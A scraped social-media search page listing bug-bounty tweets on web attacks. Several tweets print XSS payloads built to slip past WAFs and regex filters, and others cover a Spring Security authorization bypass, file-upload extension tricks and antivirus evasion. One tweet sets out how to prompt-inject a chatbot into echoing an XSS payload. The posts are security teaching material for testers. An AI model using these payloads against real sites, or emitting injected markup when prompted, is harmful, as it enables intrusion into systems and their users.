English
English Indonesia Türkçe Deutsch Español Português Pусский Français Italiano Nederlands Polski العربية ไทย Tiếng Việt 繁體中文 简体中文 日本語 한국어

#securecodingagainsthttpresponsesplitting search results

No results for "#securecodingagainsthttpresponsesplitting"
No results for "#securecodingagainsthttpresponsesplitting"
No results for "#securecodingagainsthttpresponsesplitting"
infosec_au's profile picture. Co-founder, security researcher. Building an attack surface management platform, @assetnote
shubs
@infosec_au
Jun 23

How do we turn bad SSRF (blind) into good SSRF (full response)? The @assetnote Security Research team at @SLCyberSec used a novel technique involving HTTP redirect loops and incremental status codes that leaked the full HTTP resp. It may work elsewhere! slcyber.io/assetnote-secu…

infosec_au's tweet image. How do we turn bad SSRF (blind) into good SSRF (full response)? The @assetnote Security Research team at @SLCyberSec used a novel technique involving HTTP redirect loops and incremental status codes that leaked the full HTTP resp. It may work elsewhere! slcyber.io/assetnote-secu…
6
178
621
424
41K
therceman's profile picture. 👋 I’m Anton (therceman) 🪲 Bug Bounty Hunter 💰 📖 Bug Bounty Book - https://t.co/Y9nGrZydBV
Anton
@therceman
May 29

Ethical Hacking Reminder Bypass XSS WAF protection using invisible separators before or after function name <img/src/onerror=alert&#xFEFF;(1337)> <svg/onload=&nbsp;alert&#65279;(2)>

therceman's tweet image. Ethical Hacking Reminder Bypass XSS WAF protection using invisible separators before or after function name &amp;lt;img/src/onerror=alert&amp;amp;#xFEFF;(1337)&amp;gt; &amp;lt;svg/onload=&amp;amp;nbsp;alert&amp;amp;#65279;(2)&amp;gt;
2
67
439
368
22K
0xJin's profile picture. ¯\\_(ツ)_/¯ | CPTS | OSCP | OSWP | CISM |eCPTX | eWPTX | eJPT | C|EH Master | Engineers Degree | 👾 | 💻Box Creator Vulnhub - Offsec “N0t0d4y”
N0t0d4y
 @0xJin
Oct 22, 2021

My new XSS Bypass Filter! "/><svg+svg+svg\/\/On+OnLoAd=confirm(1)> Please let me know if some researcher found this before me in the comments! Thank you :) And happy hacking! #bugbounty #bugbountytips #0day #exploit #xss #hacking #hackers #bugs

0xJin's tweet image. My new XSS Bypass Filter! &quot;/&amp;gt;&amp;lt;svg+svg+svg\/\/On+OnLoAd=confirm(1)&amp;gt; Please let me know if some researcher found this before me in the comments! Thank you :) And happy hacking! #bugbounty #bugbountytips #0day #exploit #xss #hacking #hackers #bugs
10
227
578
165
0
TakSec's profile picture. AI Red Team | Bug Bounty Hunter | Pentester
Mike Takahashi
@TakSec
Jul 27

XSS via Prompt Injection 💥🧠🔓 🤖 Find a chatbot 🧠 Ask what model it is 🔁 Get it to repeat text ⚠️ Make it say: '"><img src=x onerror=alert()> 💥 Escalate to Reflected/Stored XSS via URL param

TakSec's tweet image. XSS via Prompt Injection 💥🧠🔓 🤖 Find a chatbot 🧠 Ask what model it is 🔁 Get it to repeat text ⚠️ Make it say: &apos;&quot;&amp;gt;&amp;lt;img src=x onerror=alert()&amp;gt; 💥 Escalate to Reflected/Stored XSS via URL param
4
56
438
339
29K
hackerscrolls's profile picture. for hackers by hackers Contact: hackerscrolls@gmail.com
Hack3rScr0lls
 @hackerscrolls
Dec 12, 2020

We have combined all the tricks we know about SSRF into a single mindmap. If we missed something, write about it in the comments! High resolution: raw.githubusercontent.com/hackerscrolls/… XMind source: github.com/hackerscrolls/… #CyberSecurity #BugBountyTip #BugBounty

hackerscrolls's tweet image. We have combined all the tricks we know about SSRF into a single mindmap. If we missed something, write about it in the comments! High resolution: raw.githubusercontent.com/hackerscrolls/… XMind source: github.com/hackerscrolls/… #CyberSecurity #BugBountyTip #BugBounty
4
558
1K
423
0
wtf_brut's profile picture. I'm world last $0 million dollar hacker.
Brut 🇮🇳
@wtf_brut
Dec 24

A XSS payload with Alert Obfuscation, for bypass RegEx filters <img src="X" onerror=top[8680439..toString(30)](1337)> <script>top[8680439..toString(30)](1337)</script> #infosec #cybersec #bugbountytip #BugBounty

wtf_brut's tweet image. A XSS payload with Alert Obfuscation, for bypass RegEx filters &amp;lt;img src=&quot;X&quot; onerror=top[8680439..toString(30)](1337)&amp;gt; &amp;lt;script&amp;gt;top[8680439..toString(30)](1337)&amp;lt;/script&amp;gt; #infosec #cybersec #bugbountytip #BugBounty
0
52
337
201
15K
0x0SojalSec's profile picture. Cyber_Security_Re-searcher || 0SINT || Malware Analysis II Pwn || Ai Re-searcher || Project AI-StrikeSec || 0ld Accounts Suspended @0xSojalSec ||
Md Ismail Šojal 🕷️
 @0x0SojalSec
Dec 31, 2022

Bug Bounty Hint⚔️🛡️ File Upload Extension Splitting Cheat Sheet : #infosecurity #cybersecurite #bugbountytips

0x0SojalSec's tweet image. Bug Bounty Hint⚔️🛡️ File Upload Extension Splitting Cheat Sheet : #infosecurity #cybersecurite #bugbountytips
3
82
266
80
15K
bughuntar's profile picture. Security Researcher at @Hacker0x01 | Multiple CVE Honoree | Google Hall of Fame Rank 1st (Bangladesh) | #FreePalestine 🇵🇸 from 🇧🇩
Professor the Hunter
@bughuntar
Oct 12

Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript:prompt(404)">XSS-Click</00>--%20// #CyberSecurity #InfoSec #BugBounty #XSS

bughuntar's tweet image. Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --&apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:prompt(404)&quot;&amp;gt;XSS-Click&amp;lt;/00&amp;gt;--%20// #CyberSecurity #InfoSec #BugBounty #XSS…
2
42
302
233
10K
NullSecurityX's profile picture. Infosec researcher • Bug bounties & security analysis. Collabs/ads: root@nullsecurityx.codes /
NullSecX
@NullSecurityX
Oct 11

Unrestricted file-upload bypass: if a server trusts only Content-Type/extension, attackers can use Content-Disposition double-extensions to upload .asp/.php disguised as image/jpeg. magic-bytes ≠ MIME, presence of `<%...%>` or `<?php`, accessible executable URIs. #BugBounty

NullSecurityX's tweet image. Unrestricted file-upload bypass: if a server trusts only Content-Type/extension, attackers can use Content-Disposition double-extensions to upload .asp/.php disguised as image/jpeg. magic-bytes ≠ MIME, presence of `&amp;lt;%...%&amp;gt;` or `&amp;lt;?php`, accessible executable URIs. #BugBounty
3
61
388
258
18K
0x0SojalSec's profile picture. Cyber_Security_Re-searcher || 0SINT || Malware Analysis II Pwn || Ai Re-searcher || Project AI-StrikeSec || 0ld Accounts Suspended @0xSojalSec ||
Md Ismail Šojal 🕷️
 @0x0SojalSec
Jan 9, 2023

XSS: Arithmetic Operators & Optional Chaining To Bypass Filters & Sanitization secjuice.com/xss-arithmetic… #infosec #XSS #cybersec #bugbountytips

0x0SojalSec's tweet image. XSS: Arithmetic Operators &amp;amp; Optional Chaining To Bypass Filters &amp;amp; Sanitization secjuice.com/xss-arithmetic… #infosec #XSS #cybersec #bugbountytips
2
113
360
107
23K
sirifu4k1's profile picture. Web Pentest & girl hh & share anything ithink useful about infosec. follow me! 🇸🇬
siri@fu4k1
 @sirifu4k1
May 25, 2022

CVE-2022-22978 Spring Security RegexRequestMatcher Authorization Bypass EXP: %0d or %oa github.com/spring-project… nosec.org/m/share/5006.h…

sirifu4k1's tweet image. CVE-2022-22978 Spring Security RegexRequestMatcher Authorization Bypass EXP: %0d or %oa github.com/spring-project… nosec.org/m/share/5006.h…
7
224
658
106
0
therceman's profile picture. 👋 I’m Anton (therceman) 🪲 Bug Bounty Hunter 💰 📖 Bug Bounty Book - https://t.co/Y9nGrZydBV
Anton
@therceman
Nov 28, 2021

Bug Bounty Tip :: HTML Injection - Information Disclosure Hijack information from a page using <img> tag with unclosed "src" attr #CyberSecurity #cybersecuritytips #Hacking #BugBounty #bugbountytip #infosec #hacker #togetherwehitharder #bugcrowd #hack #hackers #hackerone

therceman's tweet image. Bug Bounty Tip :: HTML Injection - Information Disclosure Hijack information from a page using &amp;lt;img&amp;gt; tag with unclosed &quot;src&quot; attr #CyberSecurity #cybersecuritytips #Hacking #BugBounty #bugbountytip #infosec #hacker #togetherwehitharder #bugcrowd #hack #hackers #hackerone
1
108
249
58
0
SecurityTrybe's profile picture. Cybersecurity & Tech | https://t.co/NIuxWOtJYz
Security Trybe
@SecurityTrybe
Jul 31, 2023

A Bird’s Eye View of Defense-in-Depth Structure of Cybersecurity

SecurityTrybe's tweet image. A Bird’s Eye View of Defense-in-Depth Structure of Cybersecurity
1
107
260
83
24K
sardar0x1's profile picture. Offensive Security 🛡 Red Teamer 🎯 | Threat Hunter 🏹 |Penetration Tester 👨🏻‍💻 | Breaker 💣 | Builder 🛠️ | Researcher 🔬
Sardar
 @sardar0x1
Oct 10

Bypassing antiviruses using simple encoding technique algorithm in PowerShell and Python scripts, credential extraction script for browsers #redteam #RedTeaming #BlueTeam #bugbountytips #bugbounty #Security #dfir #CyberSecurity #forensic

sardar0x1's tweet image. Bypassing antiviruses using simple encoding technique algorithm in PowerShell and Python scripts, credential extraction script for browsers #redteam #RedTeaming #BlueTeam #bugbountytips #bugbounty #Security #dfir #CyberSecurity #forensic
sardar0x1's tweet image. Bypassing antiviruses using simple encoding technique algorithm in PowerShell and Python scripts, credential extraction script for browsers #redteam #RedTeaming #BlueTeam #bugbountytips #bugbounty #Security #dfir #CyberSecurity #forensic
sardar0x1's tweet image. Bypassing antiviruses using simple encoding technique algorithm in PowerShell and Python scripts, credential extraction script for browsers #redteam #RedTeaming #BlueTeam #bugbountytips #bugbounty #Security #dfir #CyberSecurity #forensic
sardar0x1's tweet image. Bypassing antiviruses using simple encoding technique algorithm in PowerShell and Python scripts, credential extraction script for browsers #redteam #RedTeaming #BlueTeam #bugbountytips #bugbounty #Security #dfir #CyberSecurity #forensic
1
3
13
5
2K
binitamshah's profile picture. Linux Evangelist, Malwares, Security enthusiast , Investor, Contrarian , Philanthropist , Reformist , Sigma female 🦋 https://t.co/WOvf41tMKV
Binni Shah
@binitamshah
Jul 22, 2018

Hiding Malware Inside Images on GoogleUserContent : blog.sucuri.net/2018/07/hiding… , Ref* - Malware Hidden Inside JPG EXIF Headers : blog.sucuri.net/2013/07/malwar…

binitamshah's tweet image. Hiding Malware Inside Images on GoogleUserContent : blog.sucuri.net/2018/07/hiding… , Ref* - Malware Hidden Inside JPG EXIF Headers : blog.sucuri.net/2013/07/malwar…
4
191
354
25
0
SPY8OY's profile picture. Security Researcher at @CredShields | Bug Bounty Hunter | Audits : Solidity & Rust | Pentester
Shreyas
@SPY8OY
May 31, 2021

Xss in asp pages reflected inside span and < blocked. Payloads: %u003Csvg onload=alert(1)> %u3008svg onload=alert(2)> %uFF1Csvg onload=alert(3)> #bugbounty #bugbountytips

SPY8OY's tweet image. Xss in asp pages reflected inside span and &amp;lt; blocked. Payloads: %u003Csvg onload=alert(1)&amp;gt; %u3008svg onload=alert(2)&amp;gt; %uFF1Csvg onload=alert(3)&amp;gt; #bugbounty #bugbountytips
7
124
318
98
0
SecurityTrybe's profile picture. Cybersecurity & Tech | https://t.co/NIuxWOtJYz
Security Trybe
@SecurityTrybe
Jan 9, 2024

Defense-in-Depth Structure of Cybersecurity

SecurityTrybe's tweet image. Defense-in-Depth Structure of Cybersecurity
0
104
312
101
19K

Something went wrong.


Something went wrong.


United States Trends